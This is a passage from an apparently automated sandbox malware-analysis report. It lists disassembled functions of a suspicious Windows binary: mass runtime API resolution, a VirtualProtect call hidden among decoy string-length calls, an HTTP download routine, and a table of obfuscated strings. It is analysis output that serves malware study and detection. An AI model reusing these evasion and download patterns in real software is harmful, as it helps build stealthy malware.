                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                      • Part of subcall function 004045C0: strlen.MSVCRT ref: 004046F0
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                      • Part of subcall function 004045C0: VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                    • SetFilePointer.KERNEL32 ref: 004029CF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFilePointerProcessProtectVirtualstrlen
                    • String ID: d|]*&R4 V"0|%U#.) )$!H)W$"Z7V0=1$#6+'n$#?)1)$j2H_!0#$$>>F_?03$$R;h$%'('#Pd"4&C3$%E7$V>>4$(*W'$Txk"*^$)##2'w1)6$)B<;1$*!*JU!/654'6>AkEV6$*R9%m$+:'U-_g&+$$,&8/f)%Z6$-RYY$3?$-X66$.R J%'l(#8$/(8<,oz$//>=P#$/>]!7.@@$01ATTU0XJ6U7PH$05TUPSURIANF$084BE1KTE6O5LEHLAJNYD$08IYO8CDWND$0CHNV09B0ME$0D%SB$0E5USERD9PUE06DTM91B8D$0GR1PG3H0WVTDAROG3560VF9RNABF8QXB7T4BBURO2TNQCAC84ECNTCFARKCG2B2G8SFQXMFIOR8C2TON7CK3NJR5$0YZTNA0OD8G04D$102B4P1SMKFCTNRWVXL7U29K$1079C7S1STJ0KMU8IO1W6$12TDN5UQSNN$15JD0U3TL9ISE7BQ$18!=3Z.:h26 $1A#_\$1AY8462CQ$1HCDFTDXIW32LP$1IC9EFDFP3JDL$1PENK2$1QW2B21KZ$1R4X$1TVPZ70M$2%^R1#\lr$2:F<E$2DSXG1P$2JHT6B7HUHGM71MEKONI5S8X4WDACWFP6C0GRAH5IYHP2XIGU344ANWKLUZJ77F7C0Q4BFWJHSAHKS4GO6PI2LPTQ$2MJAGZ4BFX4VIL0$2O43J4R$2P2VF3B$2WJDLX7DPGGGQTSDT7G29UZJ98RUCVLU$2YHV$2`j$3-._//1Ef!%<$31HALFUNJQDBCT257T$34YSV1EFJ9RP$35E1CGRLR69S8RK8TUD8I$3AULPKAHX0A1HNFD$3DH4B0KNQ$3NV52HC$3RORZNFZD8GKZV2KC7KP$3TCJ8R20O84SC18HU76$3THHTMTOGS9NQ9N0$3W9EQXPAGC7ABNZ7BV3FB4FPEXGXXZ4APLUX$3XNWTJGMBB5YSMV572$3ZTDRW6P910$42OV$45T9W$497PC9V8KYDEKWHI$4B32KEKQ3V0$4CDSRRI26O913XTENPGKV0L1P43SU0VA3PCULZICSYKGI0P1UA113L3D1LCWY0IG287NV83YGE26QFSZOB7T84GSV939WVO$4FV02JOS9$4K85KW5JTRXEK7NR5R0H3BNTLTB$4W0XW6ITFW$4WM4AE4G$4XH4L19C$4bb$573YCV3I8QJG50OHUM10IV9ICEH5BW1QWMEDXZPRPWUBZBK6MDX77RVJ7UW8O8HLZ2UTVLU46JKWA8SA4KS893TE04FCDRDRPJL6R0KAT2AXH9J9CWDDQJL5JQ3$59(.-(=6h[X,$5CQ2IZYDGADG63QP6WV$5EF7U2IFA4$5H9KUKXYJQYF$5JPMI18YNUBSWVZ61M5TEYPUHRZ$5P8)4$5S2QEOJ3W$5T6BCG5DMI1MCTON3FONOAV$5XG2$5XTNJ1V2EH5VT9O$5Y9M3C92F8J8QFEXPX5FPFR6UT$60DW7J9FSZZPQ1TM35LE1SIO$697DIVZ52AP47XOHZT0QHUIRIPDFEGA$69UIOQRC3JG$6RQV3KAW$6UTUNNQWD3X$6XI6ADMGNB34WV4CCF3$7-C4$73VZCJ3R82HQ19RV0B4$74LF9Y8JS7WAL7JKY3S$76KP1ZWB6V5QVLMRD$7MQSS2MWXATS3FRX6$7ORMJUQOC89$7TBR8JH$7V9SR5CB65HA2XLTCBVI$8$$A>^J1{f$813QQY$84MR1AB87OBWD$8HQVTX0FNVB8X3CDTO6WS8IVXRMHXAB01OZEC9NIUJOEVD$8IOLCQMIS9YOLR16RM$8KFQ5T$8QEE4ZFHSJ6$8U33VGFYYI3BW$8UQ7YWOVH2CPIKLLK9ODS83U$8WHKFDPP36W$8XEODQAWI$8XHU$8dcu$(#31T/~l$918X$91T6L9H1MFA$95JCU5UVHH3$9692YHYYKSD31N6MZNJOW9DWHQ5L1THNIX7N3$97RE3PZJGQOH3P5ZDT$9AQ$9DJZ3ZBAB1R$9I5PV$9XIDBRC2U7HPB1R$:":=R R$:>&bkh15[$<<6D-0A$<\=,!$>,"(_!N$A3GAEUCFCDRRAZO71H1XYSD8HCGS3TC1EHNROJ$A5I233Y3WEB$A7RIR8PQ8VFAXT$AAQ76BU4K8P4FZM1LTKUVHFI19BJEERVIFT385GRCLQRNUZE6DGV14C25IG79LZFQ3W9GT3PM3SJ1X4HK7NB864ND07ZZJS1WKAU8Z8NK0I8M3BIO9WB$ASGPUEW0RXRCAZMB2OQ$AU1JUYI84IW8ESPUPZQ1S6$AWB7RPWHNHEI$AXLO02D0TBFWYY63L8W$Agn|(>=$6;aj7$^#,2&$9uc$B1K21$BGVHDUZ$BJJYDKD3$BRM0QCK67$BW14XO9VR$BWRW97RBLGMAI$BY3SO3ZNB$BY6Z0ZK7G$C3QU6JTUJ9JRH$C6MN3HEB3YZVL9J$CKUOG7IHFVZL$CL8V25KW0GFFQ$CTW8WJ60YZJBO7E2$CYUNW95OTRJ740KL8$D0CK0WRX$D16D3$D2VIMBK6EJJY82DQ$D6AG1AR6QCG4ZOJ$DB0WZPYK4Z4F$DB:37/$DFMR7UD3R3ID2$DIH47G11$DKA2EJQEJUB4BLB3$DMO42YPR6A5CF$DNICYZ1QZHCGUJ9$DNZZ3PRMZ9YG021T$DX6F9CNC716M1FOO253Y6P$E=8"/>8y _4$EBKWZ1C8$EBPX$EGQU06V9719L4NV6S9ZNJA$EIPQAJPM22S$EJSFGY5C4TCYBG7UUJATKPPKIHXM0ISMUVQ47RIJ1YFC454CSKM3NHDY3I68ATMWBZDP0DXDB11VKMQMNU3P5Y8N$EKGHDDXEF26E$EMJEP8K4BT4ZGFPVHHTJ$EQ0%#b`mW&+$EUUC6LNGEGZJQXPA3QH5AEIPSTB7DD$EWBF9OQN5T0QL8MHI$F2YIP$FG083YCS$FG5T3JZ7LQ4L4GXCU0XREYSE$FHH84SVPZXCSL2E32P$FL2VC5OARR6ML0FT$FOR4R3E8B5JA5BGYXYZG$FP192MQ61X6Z3CH$FULBJJ5554NZ84EGWJCXGWENFO4D5G5T3F1XEASH91XS5CW89BIMRLHSQ755O$G6ZSDE161LSGQWLONKCC$GBVQFXXSUY$GC3DM$GGJM290$GHAGI3A566SN$GHBRPHSZW76$GO80RTDGEAZ5N$H3VIO$HEW2I18UAF$HJN8AMMHWBA8RW1OYFOKWOC$HKLISIFBV91$HKLJ6DFRI0O$HUI3D8IPOB$HXKFG99O34K0SAV9B71BMN56J3KVFPIKW63ED0GI38EI$I22MC7Q4U9848CKTSNU$I3KB$I7P6M1VQ$I7XS$IAXVIO4DR$IG0IJ06L7ZO0C3LZV$IQ68C3SDEQVR2IWTDWKH08RZ4EK0WJ29LU53MF$IW2ZH8$IZPZ8G$J5&3G?qo&]>$JJJBG3YFH$JK1WIWHQ155$JOTJ9GD7S$JRSDSKRK4KFNRWL1R7Y3L$JS8E04QWBECDQ0$JSABLSLHJM18SD5J$JSX$JV6UL95K9WA9HJ81CGSYL$JXTLBU9FA1$JZJ7IU021$J^^,$K17Q7C4A9E3Q9BKIWF9SXDQNONQ5$K41JML1OAPYK16$K5L0$KGKOHG66695HARTQ$KIU991IX6AKZZL0XQ38CPUZ4S2G9GXVG$KSOHFOCID1KV6DRKWRYA$KV1PDK7GKEBXARJYEC$KYCNUVDMWKNEISAP4CI1E$L1R3USBLOT$L7AMS8$L9L8O5443323$LGJD8ATBYCJUEAUIUOK7DK730FIBK7B0BUK79Y4MS612LO44O30$LL5JR9YL$LQKSG8CJ$LTBE2OMP$LTV$LV988NP7NO7HNI$LWBOO40EFCLXV$LY4RXQK7E$MAODP5KD3ZPPPL$MJS6G6KKHTE20YRYC$MK3BHLV2H708$ML2VDK23$MU0G6FJR1JZBPZ7R5$MY6ZYKT7PKHQVSD7ZBR$MZJ23DWZRN6N$N3U0SLW00GST4WKR849BDDI85ZJZ092YBJC42OZD5HLVA5SK234TKP1KUV53B791O4SUTQYUE6G61W8AG867EJOVS$N8L9$NBNPE$NEG5A0TBCCR8CK2YIR2G015$NG8GDSH89O98NQQU2$NNGW50T$NNUHFN7XF1VPC$NPJLKT5Z6N4YTEZOGVCM$NSWSRSOFO0RX4UVZ$NV5VH7J1OLVK84BAN0M0THCCBEFET$NX2BF8KEFF2$NYLS432Z1FKOF$O4JUDB7QR9ZUTMP$O4TP6YK54$O6EH87N869R2VSP1O6RM05KS$O6O1SSOMKYK263H$O9LFDLHC$OH7QTPZWAGG6FZOV8JXRUF36DDL$OO3L0D0Q3Q3K6J$ORDJ5$OTZWKELFM4D1ZX$OZHC2K1I4ZBGD$PA12XUR$PEMID$Q [X#Q!$Q46L87LSKNBHNFOGUXSMPA2ZS5AR7E1L6OUL08IVZY9F38A1BBHX7GBQCH2C73VFV0K9UDQWO7X1AW6T5JQ57DO0N$Q59WYHI0EYGG01PRK8U$Q62URZ2RISYD$QDK8X2I7B0OM0$QDY1WIKGV$QG949Y35HTL7C5GKU$QHP68XIN$QPELAUVJ$QZ0V93NUILM71L0UEQ$R07PB8XWUY$R6B1YSB$RAIJZEUV4X3$RBFBDN43MBK8BWYPIVMG$RGVGD24Q$RNAC0PX9349EERGJK$RNM0ZAE6HYHP$RQL4VP50QOMYL$RTN385KXC716TN4WTY7BOETVPCSC4Z9ZX75BMN8K94ZL8F6MD5LF4MGMA1N6MH2M8CJWS2JG0WCUP$RTZT6RWPB$RYRZCAL$S0JXSWP1IQFWV5M7RC$S1AZUJII$S36OGS@yq$S4J38$S671T9E2AM044S$S7XW3M$S9TLG$SESLLNXRH7RVD$SG&2$SI9XH9D$SMN46QDUZ$SRNRY2IRD8TY4ZIFOWM51HQ26PU1VF50G1V2T63DJIE4RZYW$SSHRLWDA93HDF$SSTZRX0KLKUG$SWCSHLC88J6D9$T2S8GLDOVD4FXA9X7KLFNF3$T5WSQZ3TKMV$THA1GVOD8MGZ5$TLDGLI2P8RX4P$TOL7A1I549G42FYQ$TR8HF$TUE0BB8$TUORTAUZKZ$U0EO$U8EACYPG0JEHYXD39H$U8RDZA5$UDL562LRRI9LU4RBS$UKCFUPTY7HJ$URCQYFUY7$UTR4DB7LE2FRRI0UKEDK$UVRP7ZMSKKDT$UW0OJZZ8NR7YF6BJ7T57W55$UWOFCQIK7IT4$UYRYQG36KZ$UYYXZE44YC7RUSB5$V81X4N$VACIZ4EMZNZUPPTRS$VSCN46LUJBDVJLQR$VVDNW5WUAXI0V$VWV7Y29YDNTGE8$VWX3T4P$VZAQL1I7M5$W48OLF04EZWGYD$W;X=$WA88AGOLLAM9$WGIN3G7$WI7BYXV0EET1YF$WI89JRLXPGZTEL$WKVGE6QY083V14JA8$X1KHJYI4$X;O(%zlid55*$XEPM9N6$XESHPAID$XI2WPROR$XKH822GVTRSQ9F$XKVCWNLGXHPK3XENM$XQCPOZQO1H7GWN2O7N$XUPFJ5POHQZAPO1Y$YPBBNYUEZ$YR0IVA7P0A$YTMRI55SDY1Y1ICCJC0XFPBYFYK8W2J98EHGROWEL277$Z.!2$Z355AGL$Z3Y18YAOIAGOW$Z7UDFK1IKO9AO8WQZZKEUR4$ZB5BENOQW$ZN2L6$ZXL5PN064DQ8ZO$[;%;Vph$[YA><<$^Q#39@&x,$_$`2!Q&7U*$`J&=:[76#!$e|0%M$k6(,$m.)$mm_*&$oe--)!'/'q$q?]=/V1$r.9=C]8:0$s/'=3gP,T"2$t17M @U!Ld!,R];&~R$t6;&3;w<U^S${E1K6$|!'/(C;$~|Q&/
                    • API String ID: 302189567-3985184966
                    • Opcode ID: d443029e8f2bf20fa7f914a8b34c05285ab4d42f048f177f8f76ecdda05a7ac9
                    • Instruction ID: 36ed4f7050370553a158b7b22c21376475ef50b1b023dddfde19de5bb9778b9f
                    • Opcode Fuzzy Hash: d443029e8f2bf20fa7f914a8b34c05285ab4d42f048f177f8f76ecdda05a7ac9
                    • Instruction Fuzzy Hash: F2E287B9FD0320BEE2106BE17D03B243AA197A1F09FA4113BFB04792D2F5ED16545A5E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 631 419c10-419c1a 632 419c20-41a031 GetProcAddress * 43 631->632 633 41a036-41a0ca LoadLibraryA * 8 631->633 632->633 634 41a146-41a14d 633->634 635 41a0cc-41a141 GetProcAddress * 5 633->635 636 41a153-41a211 GetProcAddress * 8 634->636 637 41a216-41a21d 634->637 635->634 636->637 638 41a298-41a29f 637->638 639 41a21f-41a293 GetProcAddress * 5 637->639 640 41a2a5-41a332 GetProcAddress * 6 638->640 641 41a337-41a33e 638->641 639->638 640->641 642 41a344-41a41a GetProcAddress * 9 641->642 643 41a41f-41a426 641->643 642->643 644 41a4a2-41a4a9 643->644 645 41a428-41a49d GetProcAddress * 5 643->645 646 41a4ab-41a4d7 GetProcAddress * 2 644->646 647 41a4dc-41a4e3 644->647 645->644 646->647 648 41a515-41a51c 647->648 649 41a4e5-41a510 GetProcAddress * 2 647->649 650 41a612-41a619 648->650 651 41a522-41a60d GetProcAddress * 10 648->651 649->648 652 41a61b-41a678 GetProcAddress * 4 650->652 653 41a67d-41a684 650->653 651->650 652->653 654 41a686-41a699 GetProcAddress 653->654 655 41a69e-41a6a5 653->655 654->655 656 41a6a7-41a703 GetProcAddress * 4 655->656 657 41a708-41a709 655->657 656->657
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,024B4D20), ref: 00419C2D
                    • GetProcAddress.KERNEL32(74DD0000,024B4B60), ref: 00419C45
                    • GetProcAddress.KERNEL32(74DD0000,024BCE48), ref: 00419C5E
                    • GetProcAddress.KERNEL32(74DD0000,024BCDE8), ref: 00419C76
                    • GetProcAddress.KERNEL32(74DD0000,024BCE00), ref: 00419C8E
                    • GetProcAddress.KERNEL32(74DD0000,024BCE18), ref: 00419CA7
                    • GetProcAddress.KERNEL32(74DD0000,024B9CC8), ref: 00419CBF
                    • GetProcAddress.KERNEL32(74DD0000,024BCE60), ref: 00419CD7
                    • GetProcAddress.KERNEL32(74DD0000,024BCE30), ref: 00419CF0
                    • GetProcAddress.KERNEL32(74DD0000,024BCE78), ref: 00419D08
                    • GetProcAddress.KERNEL32(74DD0000,024BCE90), ref: 00419D20
                    • GetProcAddress.KERNEL32(74DD0000,024B4BA0), ref: 00419D39
                    • GetProcAddress.KERNEL32(74DD0000,024B4B40), ref: 00419D51
                    • GetProcAddress.KERNEL32(74DD0000,024B4BC0), ref: 00419D69
                    • GetProcAddress.KERNEL32(74DD0000,024B4AA0), ref: 00419D82
                    • GetProcAddress.KERNEL32(74DD0000,024BCEA8), ref: 00419D9A
                    • GetProcAddress.KERNEL32(74DD0000,024EB498), ref: 00419DB2
                    • GetProcAddress.KERNEL32(74DD0000,024B99F8), ref: 00419DCB
                    • GetProcAddress.KERNEL32(74DD0000,024B49E0), ref: 00419DE3
                    • GetProcAddress.KERNEL32(74DD0000,024EB468), ref: 00419DFB
                    • GetProcAddress.KERNEL32(74DD0000,024EB5E8), ref: 00419E14
                    • GetProcAddress.KERNEL32(74DD0000,024EB5D0), ref: 00419E2C
                    • GetProcAddress.KERNEL32(74DD0000,024EB528), ref: 00419E44
                    • GetProcAddress.KERNEL32(74DD0000,024B4A00), ref: 00419E5D
                    • GetProcAddress.KERNEL32(74DD0000,024EB450), ref: 00419E75
                    • GetProcAddress.KERNEL32(74DD0000,024EB540), ref: 00419E8D
                    • GetProcAddress.KERNEL32(74DD0000,024EB378), ref: 00419EA6
                    • GetProcAddress.KERNEL32(74DD0000,024EB3F0), ref: 00419EBE
                    • GetProcAddress.KERNEL32(74DD0000,024EB588), ref: 00419ED6
                    • GetProcAddress.KERNEL32(74DD0000,024EB300), ref: 00419EEF
                    • GetProcAddress.KERNEL32(74DD0000,024EB408), ref: 00419F07
                    • GetProcAddress.KERNEL32(74DD0000,024EB570), ref: 00419F1F
                    • GetProcAddress.KERNEL32(74DD0000,024EB4C8), ref: 00419F38
                    • GetProcAddress.KERNEL32(74DD0000,024B9708), ref: 00419F50
                    • GetProcAddress.KERNEL32(74DD0000,024EB5A0), ref: 00419F68
                    • GetProcAddress.KERNEL32(74DD0000,024EB420), ref: 00419F81
                    • GetProcAddress.KERNEL32(74DD0000,024B4BE0), ref: 00419F99
                    • GetProcAddress.KERNEL32(74DD0000,024EB3D8), ref: 00419FB1
                    • GetProcAddress.KERNEL32(74DD0000,024B4A60), ref: 00419FCA
                    • GetProcAddress.KERNEL32(74DD0000,024EB510), ref: 00419FE2
                    • GetProcAddress.KERNEL32(74DD0000,024EB5B8), ref: 00419FFA
                    • GetProcAddress.KERNEL32(74DD0000,024B4A80), ref: 0041A013
                    • GetProcAddress.KERNEL32(74DD0000,024B4AE0), ref: 0041A02B
                    • LoadLibraryA.KERNEL32(024EB558,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                    • LoadLibraryA.KERNEL32(024EB318,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                    • LoadLibraryA.KERNEL32(024EB4E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                    • LoadLibraryA.KERNEL32(024EB4B0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                    • LoadLibraryA.KERNEL32(024EB438,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                    • LoadLibraryA.KERNEL32(024EB480,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                    • LoadLibraryA.KERNEL32(024EB330,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                    • LoadLibraryA.KERNEL32(024EB348,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                    • GetProcAddress.KERNEL32(75290000,024B50E0), ref: 0041A0DA
                    • GetProcAddress.KERNEL32(75290000,024EB390), ref: 0041A0F2
                    • GetProcAddress.KERNEL32(75290000,024E9410), ref: 0041A10A
                    • GetProcAddress.KERNEL32(75290000,024EB4F8), ref: 0041A123
                    • GetProcAddress.KERNEL32(75290000,024B4F20), ref: 0041A13B
                    • GetProcAddress.KERNEL32(734C0000,024B9C00), ref: 0041A160
                    • GetProcAddress.KERNEL32(734C0000,024B4FE0), ref: 0041A179
                    • GetProcAddress.KERNEL32(734C0000,024B9A98), ref: 0041A191
                    • GetProcAddress.KERNEL32(734C0000,024EB360), ref: 0041A1A9
                    • GetProcAddress.KERNEL32(734C0000,024EB3A8), ref: 0041A1C2
                    • GetProcAddress.KERNEL32(734C0000,024B4E80), ref: 0041A1DA
                    • GetProcAddress.KERNEL32(734C0000,024B5040), ref: 0041A1F2
                    • GetProcAddress.KERNEL32(734C0000,024EB3C0), ref: 0041A20B
                    • GetProcAddress.KERNEL32(752C0000,024B5060), ref: 0041A22C
                    • GetProcAddress.KERNEL32(752C0000,024B4DE0), ref: 0041A244
                    • GetProcAddress.KERNEL32(752C0000,024EB678), ref: 0041A25D
                    • GetProcAddress.KERNEL32(752C0000,024EB630), ref: 0041A275
                    • GetProcAddress.KERNEL32(752C0000,024B4E00), ref: 0041A28D
                    • GetProcAddress.KERNEL32(74EC0000,024B9BD8), ref: 0041A2B3
                    • GetProcAddress.KERNEL32(74EC0000,024B9AE8), ref: 0041A2CB
                    • GetProcAddress.KERNEL32(74EC0000,024EB600), ref: 0041A2E3
                    • GetProcAddress.KERNEL32(74EC0000,024B4EA0), ref: 0041A2FC
                    • GetProcAddress.KERNEL32(74EC0000,024B5080), ref: 0041A314
                    • GetProcAddress.KERNEL32(74EC0000,024B9AC0), ref: 0041A32C
                    • GetProcAddress.KERNEL32(75BD0000,024EB690), ref: 0041A352
                    • GetProcAddress.KERNEL32(75BD0000,024B4F40), ref: 0041A36A
                    • GetProcAddress.KERNEL32(75BD0000,024E93F0), ref: 0041A382
                    • GetProcAddress.KERNEL32(75BD0000,024EB648), ref: 0041A39B
                    • GetProcAddress.KERNEL32(75BD0000,024EB660), ref: 0041A3B3
                    • GetProcAddress.KERNEL32(75BD0000,024B50A0), ref: 0041A3CB
                    • GetProcAddress.KERNEL32(75BD0000,024B5020), ref: 0041A3E4
                    • GetProcAddress.KERNEL32(75BD0000,024EB6A8), ref: 0041A3FC
                    • GetProcAddress.KERNEL32(75BD0000,024EB618), ref: 0041A414
                    • GetProcAddress.KERNEL32(75A70000,024B5140), ref: 0041A436
                    • GetProcAddress.KERNEL32(75A70000,024EB6C0), ref: 0041A44E
                    • GetProcAddress.KERNEL32(75A70000,024EB708), ref: 0041A466
                    • GetProcAddress.KERNEL32(75A70000,024EB948), ref: 0041A47F
                    • GetProcAddress.KERNEL32(75A70000,024EB900), ref: 0041A497
                    • GetProcAddress.KERNEL32(75450000,024B4E40), ref: 0041A4B8
                    • GetProcAddress.KERNEL32(75450000,024B4F60), ref: 0041A4D1
                    • GetProcAddress.KERNEL32(75DA0000,024B4E60), ref: 0041A4F2
                    • GetProcAddress.KERNEL32(75DA0000,024EB858), ref: 0041A50A
                    • GetProcAddress.KERNEL32(6F090000,024B4F80), ref: 0041A530
                    • GetProcAddress.KERNEL32(6F090000,024B4EC0), ref: 0041A548
                    • GetProcAddress.KERNEL32(6F090000,024B4EE0), ref: 0041A560
                    • GetProcAddress.KERNEL32(6F090000,024EB9F0), ref: 0041A579
                    • GetProcAddress.KERNEL32(6F090000,024B4F00), ref: 0041A591
                    • GetProcAddress.KERNEL32(6F090000,024B50C0), ref: 0041A5A9
                    • GetProcAddress.KERNEL32(6F090000,024B4FA0), ref: 0041A5C2
                    • GetProcAddress.KERNEL32(6F090000,024B4FC0), ref: 0041A5DA
                    • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 0041A5F1
                    • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 0041A607
                    • GetProcAddress.KERNEL32(75AF0000,024EB768), ref: 0041A629
                    • GetProcAddress.KERNEL32(75AF0000,024E93B0), ref: 0041A641
                    • GetProcAddress.KERNEL32(75AF0000,024EB8A0), ref: 0041A659
                    • GetProcAddress.KERNEL32(75AF0000,024EB978), ref: 0041A672
                    • GetProcAddress.KERNEL32(75D90000,024B5000), ref: 0041A693
                    • GetProcAddress.KERNEL32(6F9F0000,024EB960), ref: 0041A6B4
                    • GetProcAddress.KERNEL32(6F9F0000,024B5100), ref: 0041A6CD
                    • GetProcAddress.KERNEL32(6F9F0000,024EB990), ref: 0041A6E5
                    • GetProcAddress.KERNEL32(6F9F0000,024EB780), ref: 0041A6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                    • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                    • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                    • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 999 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1006 406314-406318 999->1006 1007 40630d 999->1007 1008 406509-406525 call 41a7a0 call 41a800 * 2 1006->1008 1009 40631e-406342 InternetConnectA 1006->1009 1007->1006 1028 406528-40652d 1008->1028 1011 406348-40634c 1009->1011 1012 4064ff-406503 InternetCloseHandle 1009->1012 1014 40635a 1011->1014 1015 40634e-406358 1011->1015 1012->1008 1017 406364-406392 HttpOpenRequestA 1014->1017 1015->1017 1019 4064f5-4064f9 InternetCloseHandle 1017->1019 1020 406398-40639c 1017->1020 1019->1012 1022 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1020->1022 1023 40639e-4063bf InternetSetOptionA 1020->1023 1024 406407-406427 call 41a740 call 41a800 * 2 1022->1024 1025 40642c-40644b call 418940 1022->1025 1023->1022 1024->1028 1033 4064c9-4064e9 call 41a740 call 41a800 * 2 1025->1033 1034 40644d-406454 1025->1034 1033->1028 1037 406456-406480 InternetReadFile 1034->1037 1038 4064c7-4064ef InternetCloseHandle 1034->1038 1042 406482-406489 1037->1042 1043 40648b 1037->1043 1038->1019 1042->1043 1046 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1042->1046 1043->1038 1046->1037
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
